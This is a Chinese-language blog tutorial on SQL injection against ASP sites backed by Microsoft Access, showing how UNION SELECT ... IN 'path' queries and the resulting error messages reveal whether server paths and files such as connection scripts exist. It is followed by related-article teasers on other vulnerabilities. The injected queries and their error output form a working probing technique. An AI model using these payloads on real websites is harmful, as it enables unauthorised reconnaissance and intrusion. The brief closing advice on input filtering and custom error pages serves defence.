针对ACCESS漏洞又一发现

如今SQL injection可谓是火爆,诸多新的Injection方式被挖掘出来。利用系统错误来爆路径,更是热门话题,今天我也凑个热闹。

  本例测试适用于ACCESS(由于MS SQL查询不存在指定路径),ACEESS存在一个可以把源数据库的表导入到目标数据库中。

  如: mysource.mdb(admin表) —〉mydestion.mdb中

  如果要在一个已经存在的外部数据库里创建新的工作表,你可以用IN关键字。如果外部数据库不存在或是数据表已存在的话,SELECT INTO 语句将会返回一个错误信息。

  SELECT * INTO tblNewCustomers IN 'C:\Customers.mdb' FROM tblCustomers。

  左右推揣是不是能用子查询功能应用把它变成:

  一般有漏洞语句,如select * from news where id="&request("id"),存在注射的。以下的演示就用一套使用select * from news whre id=”&request(“id”)来作测试。为了方便,直接转换为SQL执行时的状态:

  select * from news where id=3 and SELECT * INTO tblNewCustomers IN 'C:\Customers.mdb' FROM tblCustomers

  经测试是不能在子查询实现导表的功能的。这条路又被档住了。突然之间想到了UNION,合并操作符,看看是否能用它。

  注:The UNION operator(适用ACCEESS)

  虽然UNION 的操作也可以视为一个合并查询,但我们不可以技术性地把它看作是一个联接,它之所以被提到是因为它能把从多个来源获得的数据合成一个结果表单中,而这一点和某些类型的联接是类似的。UNION 操作一般被用来把来自表单、SELECT语句或查询的数据结合,并省略掉任何重复的行。所有的数据源必须有相同数目的域,不过这些域不一定要是相同的数据类型。让我们假设我们有一个雇员表单,其中具有和顾客工作表单相同的结构,那么我们希望合并这两个工作表得到一个姓名和电子邮件地址信息的列表。

  SELECT [Last Name], [First Name], Email FROM tblCustomers UNION SELECT [Last Name], [First Name], Email FROM tblEmployees

  UNION操作不会显示任何在两个表单中重复出现的记录。利用UNION 的查询语句一定要与UNION前的查询语句字段列相等,如:

  select id,title from news where id=3 UNION select * from admin

  查询的字段不等,返回:

  Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005' [Microsoft][ODBC Microsoft Access Driver] 在联合查询中所选定的两个数据表或查询中的列数不匹配。

  查询语句可用避过: select id,title from news where id=3 UNION select 1,1 from admin 只要放入的1的个数与字段相等,也可实现查询。

  看看是否能够把语句变成:

  select * from news where id=3 Union SELECT * INTO tblNewCustomers IN 'C:\Customers.mdb' FROM tblCustomers

  返回:

  Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005' [Microsoft][ODBC Microsoft Access Driver] 动作查询不能作为行的来源。

  结果,还是失败的。因为UNION只适用查询结合。UNION后面不能跟动作。可能这条路走不通了,想想还是不甘心。

  试着用:

  se

  lect * from news where id=3 Union select * from admin.c

  返回:

  Microsoft JET Database Engine 错误 '80004005' 找不到文件 'C:\WINNT\system32\admin.mdb'。

  这证明和用select * from news where id=3 and 0<>(select count(*) from admin.c)是一样可以成功测试路径的。但是想想用这种方法ACCESS始终默认检测后缀MDB,虽然用以上有办法避过。便是过于麻烦。

  于是我在想是不是用其他的方法可以更简单的实现,回头想起了刚才SELECT * INTO tblNewCustomers IN 'C:\Customers.mdb' FROM tblCustomers。IN关键字不是可以指向路径文件名吗?是否可以把它归为已用。

  接着测试:

  select * from news where id=3 union select * from admin in 'c:\Customers.mdb'

  系统提示:

  Microsoft JET Database Engine 错误 '80004005' 找不到文件 'c:\Customers.mdb'。

  使用:

  select * from news where id=3 union select * from admin in 'c:\winnt\system32\cmd.exe'

  系统提示:

  Microsoft JET Database Engine 错误 '80004005' Microsoft Jet 数据库引擎打不开文件'c:\winnt\system32\CMD.EXE'。 它已经被别的用户以独占方式打开,或没有查看数据的权限。

  这种方式的实现比起用 and 0<>(select count(*) from admin)查询的结来得更为简明了,而且猜测的是MDB后缀的文件,猜测的路径和文件名正确的,信息会正常显示。但如果是猜测非MDB的文件则是这样的:

  执行:

  select * from news where id=3 union select * from admin in 'e:\www\include\connect.asp'

  返回:

  Microsoft OLE DB Provider for ODBC Drivers 错误 '80004005' [Microsoft][ODBC Microsoft Access Driver] 不可识别的数据库格式 'e:\www\include\connect.asp'

  证明所猜测的路径和文件是正确的。

  后话,由于ACCESS本身的缺陷,至使SQL INJECTION的方式层出不穷。但很大一方面是由于程序员在书写程序的时候,不注意防范,防弊大意。针对有传值的SQL语进行详细的过滤,起码也是阻挡SQL INJECTION的一道门,ACCESS本身的缺陷解使,很多法语洞防不胜防,建议服务器出错信息,创建一个自己的WEB信息出错面面,服务器出错就出现那页面。这样一来就没有参考的出错信息了,仅于些文当作参考。

(0)

相关推荐

  • 针对ACCESS漏洞又一发现

    如今SQL injection可谓是火爆,诸多新的Injection方式被挖掘出来.利用系统错误来爆路径,更是热门话题,今天我也凑个热闹. 本例测试适用于ACCESS(由于MS SQL查询不存在指定路径),ACEESS存在一个可以把源数据库的表导入到目标数据库中. 如: mysource.mdb(admin表) -〉mydestion.mdb中 如果要在一个已经存在的外部数据库里创建新的工作表,你可以用IN关键字.如果外部数据库不存在或是数据表已存在的话,SELECT INTO 语句将会返回一个

  • 跟我学TCP端口作用,漏洞,操作详析

    在上网的时候,我们经常会看到"端口"这个词,也会经常用到端口号,比如在FTP地址后面增加的"21",21就表示端口号.那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考. 21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务. 端口说明:21端口主要用于FTP(File Transfer Protocol,文件传

  • IE最新安全漏洞补救几大措施

    近日,IE浏览器又出现一个严重的安全漏洞,恶意用户可以利用HTML电子邮件信息或恶意网页,控制该计算机系统.由于利用该漏洞的代码已经被公布在互联网上,因此,目前这一漏洞具有高危险性. IE在处理"frame"和"iframe"HTML元素的两种属性时就可能会出现缓冲区溢出,新发现的IE漏洞正是利用了这一点.当用户使用一个存在漏洞的IE版本访问恶意网页或使用Outlook.Outlook Express.AOL以及Lotus Notes等依赖于 WebBrowser

  • 第一个Vista的安全漏洞已被微软证实

    来自微软安全响应中心的消息, 日前, 公司已正式确认了一个存在于 Windows 2000 SP4, Windows Server 2003 SP1, Windows XP SP1, Windows XP SP2 以及 Windows Vista 中的安全漏洞. 该漏洞源自 Client Server Run-Time Subsystem 的缺陷, 可以被利用并导致本地权限的提升. 当然, 前提是入侵者必须首先获得系统的访问权限. 而且, 当前也还没有发现针对此漏洞的攻击代码. 微软表示, Vi

  • ACCESS数据库修改自动编号的ID值为零的方法分享

    我们在开发软件,或者网站制作时候,经常用ACCESS MDB数据库进行调试,很多自动编号的数据都删除了,最后ID很大,或者不连贯.针对ACCESS数据库,有时候因删除内容导致ID跳号,或者其他原因,想修改自动编号的ID,怎么操作呢?让我们一步一步对ACCESS数据库ID进行归零,修改自动编号的ID值,再重新自动编号. 以下是我的修改方法,是可行的,与大家分享一下:(操作之前,一定要备份数据库,防止意外发生,呵呵) 1.备份ACCESS数据库(这个是必须的) 2.打开数据库,右键点击要修改ID值的

  • 如何让access自动编号从1开始排序实现方法

    方法一: 删个那个自动编号的字段,再建一个同样的自动编号字段即可. 方法二: 自动编号是一直增加的(每次都加1),你再增加一条记录它的编号会在前面的基础上加1(删除的也算),如果你编号为1的记录被删除了,你想再要从1开始,可以打开Access数据库,选择工具,再选择数据库实用工具,单击压缩和修复数据库,这样就OK了. 方法三:(没试过) 1.在access里新建一个查询. 2.把视图改为sql视图. 3.在里面输入 ALTER TABLE 表名 ALTER COLUMN [自动编号字段名] CO

  • Oracle也有注入漏洞

    正在看的ORACLE教程是:Oracle也有注入漏洞.近期,MSN.江民等知名网站相继受到了黑客的威胁和攻击,一时间网络上风声鹤唳.本报编辑部接到本文作者(炽天使)的电话,他详细讲述了发现国内最大域名提供商(以下简称"X网")网站漏洞的经过.本报编辑部立即和X网的首席工程师进行了交流,确认了漏洞的真实性,该工程师也及时修补了该漏洞. 发 现 10月18日,笔者手上的项目做完以后,便和网上的朋友天南海北地聊天.听到朋友网站的开张,心里也是非常的羡慕. 什么时候我才能拥有自己的主机和域名-

  • 高危险ANI鼠标指针漏洞非官方免疫补丁

    高危险ANI鼠标指针漏洞非官方免疫补丁 请访客朋友们尽快安装此补丁. 感谢jh的投递 此补丁是非官方组织EEYE开发的针对此漏洞的补丁(作者:Derek Soeder - eEye Digital Security), 经测试该补丁可很好的解决该漏洞引发的问题, 安装此补丁即可杜绝该漏洞导致的问题, 建议您安装此补丁以防止恶意程序危害您的系统. 注: 该补丁安装后会自动重新启动系统, 安装前先保存好您的工作, 以防重要信息丢失. 该程序安装后会在开始菜单->程序中生成一个eEye Windows

  • C#实现的ACCESS数据库操作类完整实例

    本文实例讲述了C#实现的ACCESS数据库操作类.分享给大家供大家参考,具体如下: 这个是针对ACCESS数据库操作的类,同样也是从SQLHELPER提取而来,分页程序的调用可以参考MSSQL那个类的调用,差不多的,只是提取所有记录的数量的时候有多一个参数,这个需要注意一下! using System; using System.Text; using System.Collections; using System.Collections.Specialized; using System.D

  • 最新MySQL数据库漏洞情况通报

    近日,互联网上披露了关于MySQL数据库存在代码执行漏洞( CNNVD-201609-183 )的情况.由于MySQL数据库默认配置存在一定缺陷,导致攻击者可利用该漏洞对数据库配置文件进行篡改,进而以管理员权限执行任意代码,远程控制受影响服务器.目前,Oracle官方网站发布声明将于10月发布关键补丁更新信息. 一.漏洞简介 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统. MySQL数据库中的配置文件(my.cnf)存在远程代码执行漏洞(漏洞编号:CNN

随机推荐